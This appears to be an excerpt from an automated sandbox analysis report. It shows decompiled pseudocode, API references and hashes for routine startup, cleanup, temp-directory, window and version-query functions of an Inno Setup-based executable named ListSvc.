Associated: 00000002.00000002.370460929.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.370680209.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.370687660.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.370693498.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.370699761.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ListSvc.jbxd

Similarity

API ID: Virtual$ProtectQuery$InfoSystem
String ID:
API String ID: 2441996862-0
Opcode ID: 57281b4e736338f8d77ca256b537dd22dd4c981be38144bf210ac0f1d0b120f5
Instruction ID: 3a96586125c0dafbea7f6284d897bb751f900199eded140d0d018ead0d29608e
Opcode Fuzzy Hash: 57281b4e736338f8d77ca256b537dd22dd4c981be38144bf210ac0f1d0b120f5
Instruction Fuzzy Hash: C5212CB1104344BAD730DA99C885F6BBBEC9B56354F04492EF59583681D339E848C766

Uniqueness

Uniqueness Score: -1.00%

Function 00407750, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 93
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E00407750() {
				void* _t20;
				void* _t23;
				intOrPtr _t31;
				intOrPtr* _t33;
				void* _t46;
				struct HINSTANCE__* _t49;
				void* _t56;

				if( *0x4b7004 != 0) {
					E00407630();
					E004076B8(_t46);
					 *0x4b7004 = 0;
				}
				if( *0x4bdbcc != 0 && GetCurrentThreadId() ==  *0x4bdbf4) {
					E00407388(0x4bdbc8);
					E0040768C(0x4bdbc8);
				}
				if( *0x004BDBC0 != 0 ||  *0x4bb054 == 0) {
					L8:
					if( *((char*)(0x4bdbc0)) == 2 &&  *0x4b7000 == 0) {
						 *0x004BDBA4 = 0;
					}
					if( *((char*)(0x4bdbc0)) != 0) {
						L14:
						E004073B0();
						if( *((char*)(0x4bdbc0)) <= 1 ||  *0x4b7000 != 0) {
							_t15 =  *0x004BDBA8;
							if( *0x004BDBA8 != 0) {
								E0040B40C(_t15);
								_t31 =  *((intOrPtr*)(0x4bdba8));
								_t8 = _t31 + 0x10; // 0x400000
								_t49 =  *_t8;
								_t9 = _t31 + 4; // 0x400000
								if(_t49 !=  *_t9 && _t49 != 0) {
									FreeLibrary(_t49);
								}
							}
						}
						E00407388(0x4bdb98);
						if( *((char*)(0x4bdbc0)) == 1) {
							 *0x004BDBBC();
						}
						if( *((char*)(0x4bdbc0)) != 0) {
							E0040768C(0x4bdb98);
						}
						if( *0x4bdb98 == 0) {
							if( *0x4bb038 != 0) {
								 *0x4bb038();
							}
							ExitProcess( *0x4b7000); // executed
						}
						memcpy(0x4bdb98,  *0x4bdb98, 0xc << 2);
						_t56 = _t56 + 0xc;
						0x4b7000 = 0x4b7000;
						0x4bdb98 = 0x4bdb98;
						goto L8;
					} else {
						_t20 = E004054B4();
						_t44 = _t20;
						if(_t20 == 0) {
							goto L14;
						} else {
							goto L13;
						}
						do {
							L13:
							E00405CE8(_t44);
							_t23 = E004054B4();
							_t44 = _t23;
						} while (_t23 != 0);
						goto L14;
					}
				} else {
					do {
						_t33 =  *0x4bb054; // 0x0
						 *0x4bb054 = 0;
						 *_t33();
					} while ( *0x4bb054 != 0);
					L8:
					while(1) {
					}
				}
			}

APIs

GetCurrentThreadId.KERNEL32 ref: 00407780
FreeLibrary.KERNEL32(00400000,?,?,?,0040788A,004054FF,00405546,?,?,0040555F,?,?,?,?,00453AEA,00000000), ref: 00407828
ExitProcess.KERNEL32(00000000,?,?,?,0040788A,004054FF,00405546,?,?,0040555F,?,?,?,?,00453AEA,00000000), ref: 00407861

Part of subcall function 004076B8: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?,0040788A,004054FF,00405546,?,?,0040555F), ref: 004076F1
Part of subcall function 004076B8: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?,0040788A,004054FF,00405546,?,?), ref: 004076F7
Part of subcall function 004076B8: GetStdHandle.KERNEL32(000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?), ref: 00407712
Part of subcall function 004076B8: WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?), ref: 00407718

Strings

MZP, xrefs: 00407827

Memory Dump Source

Source File: 00000002.00000002.370471802.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.370460929.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.370680209.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.370687660.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.370693498.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.370699761.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ListSvc.jbxd

Similarity

API ID: FileHandleWrite$CurrentExitFreeLibraryProcessThread
String ID: MZP
API String ID: 3490077880-2889622443
Opcode ID: 1ba9ccdc5e5ec41ea7066db700fb32a50d39e50ecd0d58aa72eac7c5645d258d
Instruction ID: 4bb8ca2865ae45d0ec72c9e6ca862cba493d08d50c1d65b63798a8296780cd14
Opcode Fuzzy Hash: 1ba9ccdc5e5ec41ea7066db700fb32a50d39e50ecd0d58aa72eac7c5645d258d
Instruction Fuzzy Hash: 76317220E087415BE721BB7A888875B76E09B45315F14897FE541A33D2D77CB884CB6F

Uniqueness

Uniqueness Score: -1.00%

Function 00407748, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 86
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E00407748() {
				intOrPtr* _t14;
				void* _t23;
				void* _t26;
				intOrPtr _t34;
				intOrPtr* _t36;
				void* _t50;
				struct HINSTANCE__* _t53;
				void* _t62;

				 *((intOrPtr*)(_t14 +  *_t14)) =  *((intOrPtr*)(_t14 +  *_t14)) + _t14 +  *_t14;
				if( *0x4b7004 != 0) {
					E00407630();
					E004076B8(_t50);
					 *0x4b7004 = 0;
				}
				if( *0x4bdbcc != 0 && GetCurrentThreadId() ==  *0x4bdbf4) {
					E00407388(0x4bdbc8);
					E0040768C(0x4bdbc8);
				}
				if( *0x004BDBC0 != 0 ||  *0x4bb054 == 0) {
					L9:
					if( *((char*)(0x4bdbc0)) == 2 &&  *0x4b7000 == 0) {
						 *0x004BDBA4 = 0;
					}
					if( *((char*)(0x4bdbc0)) != 0) {
						L15:
						E004073B0();
						if( *((char*)(0x4bdbc0)) <= 1 ||  *0x4b7000 != 0) {
							_t18 =  *0x004BDBA8;
							if( *0x004BDBA8 != 0) {
								E0040B40C(_t18);
								_t34 =  *((intOrPtr*)(0x4bdba8));
								_t8 = _t34 + 0x10; // 0x400000
								_t53 =  *_t8;
								_t9 = _t34 + 4; // 0x400000
								if(_t53 !=  *_t9 && _t53 != 0) {
									FreeLibrary(_t53);
								}
							}
						}
						E00407388(0x4bdb98);
						if( *((char*)(0x4bdbc0)) == 1) {
							 *0x004BDBBC();
						}
						if( *((char*)(0x4bdbc0)) != 0) {
							E0040768C(0x4bdb98);
						}
						if( *0x4bdb98 == 0) {
							if( *0x4bb038 != 0) {
								 *0x4bb038();
							}
							ExitProcess( *0x4b7000); // executed
						}
						memcpy(0x4bdb98,  *0x4bdb98, 0xc << 2);
						_t62 = _t62 + 0xc;
						0x4b7000 = 0x4b7000;
						0x4bdb98 = 0x4bdb98;
						goto L9;
					} else {
						_t23 = E004054B4();
						_t48 = _t23;
						if(_t23 == 0) {
							goto L15;
						} else {
							goto L14;
						}
						do {
							L14:
							E00405CE8(_t48);
							_t26 = E004054B4();
							_t48 = _t26;
						} while (_t26 != 0);
						goto L15;
					}
				} else {
					do {
						_t36 =  *0x4bb054; // 0x0
						 *0x4bb054 = 0;
						 *_t36();
					} while ( *0x4bb054 != 0);
					L9:
					while(1) {
					}
				}
			}

APIs

GetCurrentThreadId.KERNEL32 ref: 00407780
FreeLibrary.KERNEL32(00400000,?,?,?,0040788A,004054FF,00405546,?,?,0040555F,?,?,?,?,00453AEA,00000000), ref: 00407828
ExitProcess.KERNEL32(00000000,?,?,?,0040788A,004054FF,00405546,?,?,0040555F,?,?,?,?,00453AEA,00000000), ref: 00407861

Part of subcall function 004076B8: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?,0040788A,004054FF,00405546,?,?,0040555F), ref: 004076F1
Part of subcall function 004076B8: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?,0040788A,004054FF,00405546,?,?), ref: 004076F7
Part of subcall function 004076B8: GetStdHandle.KERNEL32(000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?), ref: 00407712
Part of subcall function 004076B8: WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?), ref: 00407718

Strings

MZP, xrefs: 00407827

Memory Dump Source

Source File: 00000002.00000002.370471802.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.370460929.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.370680209.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.370687660.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.370693498.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.370699761.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ListSvc.jbxd

Similarity

API ID: FileHandleWrite$CurrentExitFreeLibraryProcessThread
String ID: MZP
API String ID: 3490077880-2889622443
Opcode ID: 1e4888025ee955e8cc7e0f2d2f1a13e961f3985afae2446d4f356ca194078bac
Instruction ID: bfc25cbdcfe625b544084418af651039c1e49876b6b13a82c314e6a817d38f33
Opcode Fuzzy Hash: 1e4888025ee955e8cc7e0f2d2f1a13e961f3985afae2446d4f356ca194078bac
Instruction Fuzzy Hash: E3314D20E087419BE721BB7A888935B7BA09B05315F14897FE541A73D2D77CB884CB6F

Uniqueness

Uniqueness Score: -1.00%

Function 004B5000, Relevance: 6.0, APIs: 4, Instructions: 43
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 79%

			E004B5000(void* __ecx, void* __edx) {
				intOrPtr _t19;
				intOrPtr _t22;

				_push(_t22);
				_push(0x4b50d7);
				_push( *[fs:eax]);
				 *[fs:eax] = _t22;
				 *0x4bb98c =  *0x4bb98c - 1;
				if( *0x4bb98c < 0) {
					E00405B74();
					E004051A8();
					SetThreadLocale(0x400); // executed
					E0040A250();
					 *0x4b700c = 2;
					 *0x4bb01c = 0x4036b0;
					 *0x4bb020 = 0x4036b8;
					 *0x4bb05a = 2;
					 *0x4bb060 = E0040CAA4();
					 *0x4bb008 = 0x4095a0;
					E00405BCC(E00405BB0());
					 *0x4bb068 = 0xd7b0;
					 *0x4bb344 = 0xd7b0;
					 *0x4bb620 = 0xd7b0;
					 *0x4bb050 = GetCommandLineW();
					 *0x4bb04c = E00403810();
					 *0x4bb97c = GetACP();
					 *0x4bb980 = 0x4b0;
					 *0x4bb044 = GetCurrentThreadId();
					E0040CAB8();
				}
				_pop(_t19);
				 *[fs:eax] = _t19;
				_push(0x4b50de);
				return 0;
			}

APIs

SetThreadLocale.KERNEL32(00000400,00000000,004B50D7), ref: 004B502D

Part of subcall function 0040A250: InitializeCriticalSection.KERNEL32(004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A255
Part of subcall function 0040A250: GetVersion.KERNEL32(004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A263
Part of subcall function 0040A250: GetModuleHandleW.KERNEL32(kernel32.dll,GetThreadPreferredUILanguages,004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A28A
Part of subcall function 0040A250: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040A290
Part of subcall function 0040A250: GetModuleHandleW.KERNEL32(kernel32.dll,SetThreadPreferredUILanguages,00000000,kernel32.dll,GetThreadPreferredUILanguages,004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A2A4
Part of subcall function 0040A250: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040A2AA
Part of subcall function 0040A250: GetModuleHandleW.KERNEL32(kernel32.dll,GetThreadUILanguage,00000000,kernel32.dll,SetThreadPreferredUILanguages,00000000,kernel32.dll,GetThreadPreferredUILanguages,004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A2BE
Part of subcall function 0040A250: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040A2C4

Part of subcall function 0040CAA4: GetSystemInfo.KERNEL32 ref: 0040CAA8

GetCommandLineW.KERNEL32(00000400,00000000,004B50D7), ref: 004B5092

Part of subcall function 00403810: GetStartupInfoW.KERNEL32 ref: 00403821

GetACP.KERNEL32(00000400,00000000,004B50D7), ref: 004B50A6
GetCurrentThreadId.KERNEL32 ref: 004B50BA

Part of subcall function 0040CAB8: GetVersion.KERNEL32(004B50C9,00000400,00000000,004B50D7), ref: 0040CAB8

Memory Dump Source

Source File: 00000002.00000002.370471802.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.370460929.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.370680209.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.370687660.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.370693498.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.370699761.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ListSvc.jbxd

Similarity

API ID: AddressHandleModuleProc$InfoThreadVersion$CommandCriticalCurrentInitializeLineLocaleSectionStartupSystem
String ID:
API String ID: 2740004594-0
Opcode ID: aeeb1ef19c021384e5e919f33d2f1f63d534ea4b25bb20b8f726cabb6b9d9f22
Instruction ID: 4c04e7183c3d5c6504f231a905193e891933426fc174ea8e71756e1f90614aff
Opcode Fuzzy Hash: aeeb1ef19c021384e5e919f33d2f1f63d534ea4b25bb20b8f726cabb6b9d9f22
Instruction Fuzzy Hash: 46111CB04047449FE311BF76A8062267BA8EB05309B508A7FE110662E2EBFD15048FEE

Uniqueness

Uniqueness Score: -1.00%

Function 004AEFE8, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 73%

			E004AEFE8(void* __eax, long __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char* _v16;
				char _v20;
				intOrPtr _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				int _t30;
				intOrPtr _t63;
				void* _t71;
				void* _t73;
				intOrPtr _t75;
				intOrPtr _t76;

				_t71 = __edi;
				_t54 = __ebx;
				_t75 = _t76;
				_t55 = 4;
				do {
					_push(0);
					_push(0);
					_t55 = _t55 - 1;
				} while (_t55 != 0);
				_push(_t55);
				_push(__ebx);
				_t73 = __eax;
				_t78 = 0;
				_push(_t75);
				_push(0x4af0e1);
				_push( *[fs:eax]);
				 *[fs:eax] = _t76;
				while(1) {
					E00422D70( &_v12, _t54, _t55, _t78); // executed
					_t55 = L".tmp";
					E004AEEC8(0, _t54, L".tmp", _v12, _t71, _t73,  &_v8); // executed
					_t30 = CreateDirectoryW(E004084EC(_v8), 0); // executed
					if(_t30 != 0) {
						break;
					}
					_t54 = GetLastError();
					_t78 = _t54 - 0xb7;
					if(_t54 != 0xb7) {
						E00426F08(0x3d,  &_v32, _v8);
						_v28 = _v32;
						E00419E18( &_v36, _t54, 0);
						_v24 = _v36;
						E004232EC(_t54,  &_v40);
						_v20 = _v40;
						E00426ED8(0x81, 2,  &_v28,  &_v16);
						_t55 = _v16;
						E0041F264(_v16, 1);
						E0040711C();
					}
				}
				E00407E00(_t73, _v8);
				__eflags = 0;
				_pop(_t63);
				 *[fs:eax] = _t63;
				_push(E004AF0E8);
				E00407A80( &_v40, 3);
				return E00407A80( &_v16, 3);
			}

APIs

CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,004AF0E1,?,?,?,00000003,00000000,00000000,?,004B619F), ref: 004AF030
GetLastError.KERNEL32(00000000,00000000,?,00000000,004AF0E1,?,?,?,00000003,00000000,00000000,?,004B619F), ref: 004AF039

Strings

.tmp, xrefs: 004AF019

Memory Dump Source

Source File: 00000002.00000002.370471802.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.370460929.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.370680209.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.370687660.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.370693498.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.370699761.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ListSvc.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID: .tmp
API String ID: 1375471231-2986845003
Opcode ID: b866ae3ac5566b90e4d091c6d0119bd5c5d6e6cd69059738e462e2ab807557f0
Instruction ID: 89b964d67460c442e7c67535b057b8112791baa86db9a38931a927ffd746d2a8
Opcode Fuzzy Hash: b866ae3ac5566b90e4d091c6d0119bd5c5d6e6cd69059738e462e2ab807557f0
Instruction Fuzzy Hash: 3A218735A041089BDB00EBE1C842ADFB3B9EB49304F50447BF800F7381DA386E058BA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040E450, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040E450(long __eax, WCHAR* __edx, void* _a4, struct HINSTANCE__* _a8, struct HMENU__* _a12, struct HWND__* _a16, int _a20, int _a24, int _a28, int _a32, long _a36) {
				WCHAR* _v8;
				void* _t13;
				struct HWND__* _t24;
				WCHAR* _t29;
				long _t32;

				_v8 = _t29;
				_t32 = __eax;
				_t13 = E00405740();
				_t24 = CreateWindowExW(_t32, __edx, _v8, _a36, _a32, _a28, _a24, _a20, _a16, _a12, _a8, _a4); // executed
				E00405730(_t13);
				return _t24;
			}

0x0040e457
0x0040e45c
0x0040e45e
0x0040e48f
0x0040e498
0x0040e4a4

APIs

CreateWindowExW.USER32 ref: 0040E48F

Strings

STATIC, xrefs: 0040E48D
InnoSetupLdrWindow, xrefs: 0040E453

Memory Dump Source

Source File: 00000002.00000002.370471802.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.370460929.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.370680209.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.370687660.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.370693498.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.370699761.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ListSvc.jbxd

Similarity

API ID: CreateWindow
String ID: InnoSetupLdrWindow$STATIC
API String ID: 716092398-2209255943
Opcode ID: 4ba199ab3c1e041c72a50ebd66c3ee798d5f8225e8fee486b5eb3d70e3749009
Instruction ID: 770f17d29583ffea265d4876c6cd55b491c436ce5e2cc0b006eebdc9bc405b2a
Opcode Fuzzy Hash: 4ba199ab3c1e041c72a50ebd66c3ee798d5f8225e8fee486b5eb3d70e3749009
Instruction Fuzzy Hash: 73F07FB6600118AF9B84DE9EDC85E9B77ECEB4D264B05412ABA08E7201D634ED118BA4

Uniqueness

Uniqueness Score: -1.00%

Function 004AF1B4, Relevance: 5.0, APIs: 4, Instructions: 45
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004AF1B4(long __eax, intOrPtr __edx, long _a4, long _a8) {
				intOrPtr _v8;
				long _t5;
				long _t9;
				void* _t10;
				void* _t13;
				void* _t15;
				void* _t16;

				_t5 = __eax;
				_v8 = __edx;
				_t9 = __eax;
				_t15 = _t10 - 1;
				if(_t15 < 0) {
					L10:
					return _t5;
				}
				_t16 = _t15 + 1;
				_t13 = 0;
				while(1) {
					_t19 = _t13 - 1;
					if(_t13 != 1) {
						__eflags = _t13 - 1;
						if(__eflags > 0) {
							Sleep(_a4);
						}
					} else {
						Sleep(_a8);
					}
					_t5 = E00427154(_t9, _v8, _t19); // executed
					if(_t5 != 0) {
						goto L10;
					}
					_t5 = GetLastError();
					if(_t5 == 2) {
						goto L10;
					}
					_t5 = GetLastError();
					if(_t5 == 3) {
						goto L10;
					}
					_t13 = _t13 + 1;
					_t16 = _t16 - 1;
					if(_t16 != 0) {
						continue;
					}
					goto L10;
				}
				goto L10;
			}

APIs

Sleep.KERNEL32(?,?,?,?,0000000D,?,004B64EC,000000FA,00000032,004B6554), ref: 004AF1D3
Sleep.KERNEL32(?,?,?,?,0000000D,?,004B64EC,000000FA,00000032,004B6554), ref: 004AF1E3
GetLastError.KERNEL32(?,?,?,0000000D,?,004B64EC,000000FA,00000032,004B6554), ref: 004AF1F6
GetLastError.KERNEL32(?,?,?,0000000D,?,004B64EC,000000FA,00000032,004B6554), ref: 004AF200

Memory Dump Source

Source File: 00000002.00000002.370471802.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.370460929.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.370680209.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.370687660.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.370693498.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.370699761.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ListSvc.jbxd

Similarity

API ID: ErrorLastSleep
String ID:
API String ID: 1458359878-0
Opcode ID: 132a67e1d44d9774a6928004e5d8cee8820d44842addde93f31c36794548402b
Instruction ID: c6a2870ed3ca6a3ef6dac7de38143878fdab2d33d6efdb0808b7300bb595a527
Opcode Fuzzy Hash: 132a67e1d44d9774a6928004e5d8cee8820d44842addde93f31c36794548402b
Instruction Fuzzy Hash: 0CF02B37B04224A76724A5EBEC46D6FE298DEB33A8710457BFC04D7302C439CC4542A8

Uniqueness

Uniqueness Score: -1.00%

Function 0041FF94, Relevance: 4.6, APIs: 3, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E0041FF94(void* __eax, void* __ebx, signed int* __ecx, signed int* __edx, void* __edi, void* __esi, signed int* _a4) {
				char _v8;
				char _v9;
				int _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _t33;
				int _t43;
				int _t64;
				intOrPtr _t72;
				intOrPtr _t74;
				signed int* _t77;
				signed int* _t79;
				void* _t81;
				void* _t82;
				intOrPtr _t83;

				_t81 = _t82;
				_t83 = _t82 + 0xffffffe8;
				_v8 = 0;
				_t77 = __ecx;
				_t79 = __edx;
				_push(_t81);
				_push(0x420094);
				_push( *[fs:eax]);
				 *[fs:eax] = _t83;
				_v9 = 0;
				E00407E48( &_v8, __eax);
				E00407FB0( &_v8);
				_t33 = GetFileVersionInfoSizeW(E004084EC(_v8),  &_v16); // executed
				_t64 = _t33;
				if(_t64 == 0) {
					_pop(_t72);
					 *[fs:eax] = _t72;
					_push(0x42009b);
					return E00407A20( &_v8);
				} else {
					_v20 = E004053F0(_t64);
					_push(_t81);
					_push(0x420077);
					_push( *[fs:edx]);
					 *[fs:edx] = _t83;
					_t43 = GetFileVersionInfoW(E004084EC(_v8), _v16, _t64, _v20); // executed
					if(_t43 != 0 && VerQueryValueW(_v20, 0x4200a8,  &_v24,  &_v28) != 0) {
						 *_t79 =  *(_v24 + 0x10) >> 0x00000010 & 0x0000ffff;
						 *_t77 =  *(_v24 + 0x10) & 0x0000ffff;
						 *_a4 =  *(_v24 + 0x14) >> 0x00000010 & 0x0000ffff;
						_v9 = 1;
					}
					_pop(_t74);
					 *[fs:eax] = _t74;
					_push(0x42007e);
					return E0040540C(_v20);
				}
			}

APIs

GetFileVersionInfoSizeW.VERSION(00000000,?,00000000,00420094), ref: 0041FFD9
GetFileVersionInfoW.VERSION(00000000,?,00000000,?,00000000,00420077,?,00000000,?,00000000,00420094), ref: 00420012
VerQueryValueW.VERSION(?,004200A8,?,?,00000000,?,00000000,?,00000000,00420077,?,00000000,?,00000000,00420094), ref: 0042002C

Memory Dump Source

Source File: 00000002.00000002.370471802.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.370460929.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.370680209.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.370687660.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.370693498.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.370699761.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ListSvc.jbxd

Similarity

API ID: FileInfoVersion$QuerySizeValue
String ID:
API String ID: 2179348866-0
Opcode ID: db1b7188df03ba7b3b32e0e3197f16d1bbb1710ebdecda22b0e2c2fca2e7d661
Instruction ID: 087fa93cc02b824bee97242c1a4c1e6fbe52d07f241be95d6751b2a9bfa32856
Opcode Fuzzy Hash: db1b7188df03ba7b3b32e0e3197f16d1bbb1710ebdecda22b0e2c2fca2e7d661
Instruction Fuzzy Hash: 19314771A042199FD710DFA9D941DAFB7F8EB48700B91447AF944E3252D778DD00C765

Uniqueness

Uniqueness Score: -1.00%

Function 0040B110, Relevance: 3.1, APIs: 2, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E0040B110(intOrPtr __eax, void* __ebx, signed int __ecx, signed int __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				signed int _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				signed int _t41;
				signed short _t43;
				signed short _t46;
				signed int _t60;
				intOrPtr _t68;
				void* _t79;
				signed int* _t81;
				intOrPtr _t84;

				_t79 = __edi;
				_t61 = __ecx;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(__ebx);
				_push(__esi);
				_t81 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				E00407B04(_v8);
				E00407B04(_v12);
				_push(_t84);
				_push(0x40b227);
				_push( *[fs:eax]);
				 *[fs:eax] = _t84;
				E00407A20(__ecx);
				if(_v12 == 0) {
					L14:
					_pop(_t68);
					 *[fs:eax] = _t68;
					_push(E0040B22E);
					return E00407A80( &_v28, 6);
				}
				E00407E48( &_v20, _v12);
				_t41 = _v12;
				if(_t41 != 0) {
					_t41 =  *(_t41 - 4);
				}
				_t60 = _t41;
				if(_t60 < 1) {
					L7:
					_t43 = E0040AE34(_v8, _t60, _t61,  &_v16, _t81); // executed
					if(_v16 == 0) {
						L00403730();
						E0040A7E4(_t43, _t60,  &_v24, _t79, _t81);
						_t46 = E0040AF60(_v20, _t60, _t81, _v24, _t79, _t81); // executed
						__eflags =  *_t81;
						if( *_t81 == 0) {
							__eflags =  *0x4bdc0c;
							if( *0x4bdc0c == 0) {
								L00403738();
								E0040A7E4(_t46, _t60,  &_v28, _t79, _t81);
								E0040AF60(_v20, _t60, _t81, _v28, _t79, _t81);
							}
						}
						__eflags =  *_t81;
						if(__eflags == 0) {
							E0040B044(_v20, _t60, _t81, __eflags); // executed
						}
					} else {
						E0040AF60(_v20, _t60, _t81, _v16, _t79, _t81);
					}
					goto L14;
				}
				while( *((short*)(_v12 + _t60 * 2 - 2)) != 0x2e) {
					_t60 = _t60 - 1;
					__eflags = _t60;
					if(_t60 != 0) {
						continue;
					}
					goto L7;
				}
				_t61 = _t60;
				E004088AC(_v12, _t60, 1,  &_v20);
				goto L7;
			}

APIs

GetUserDefaultUILanguage.KERNEL32(00000000,0040B227,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0040B2AE,00000000,?,00000105), ref: 0040B1BB
GetSystemDefaultUILanguage.KERNEL32(00000000,0040B227,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0040B2AE,00000000,?,00000105), ref: 0040B1E3

Memory Dump Source

Source File: 00000002.00000002.370471802.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.370460929.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.370680209.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.370687660.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.370693498.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.370699761.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ListSvc.jbxd

Similarity

API ID: DefaultLanguage$SystemUser
String ID:
API String ID: 384301227-0
Opcode ID: 8091743a5a45bbad2069f173d476493d8776fa257b9783c2651a700d4e0e0a8f
